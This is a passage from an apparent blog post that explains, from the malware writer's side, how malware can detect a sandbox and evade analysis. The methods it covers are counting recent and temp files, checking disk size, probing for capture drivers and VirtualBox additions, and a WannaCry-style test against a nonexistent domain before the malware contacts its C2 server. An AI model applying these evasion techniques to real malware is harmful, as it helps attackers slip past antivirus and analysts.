Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.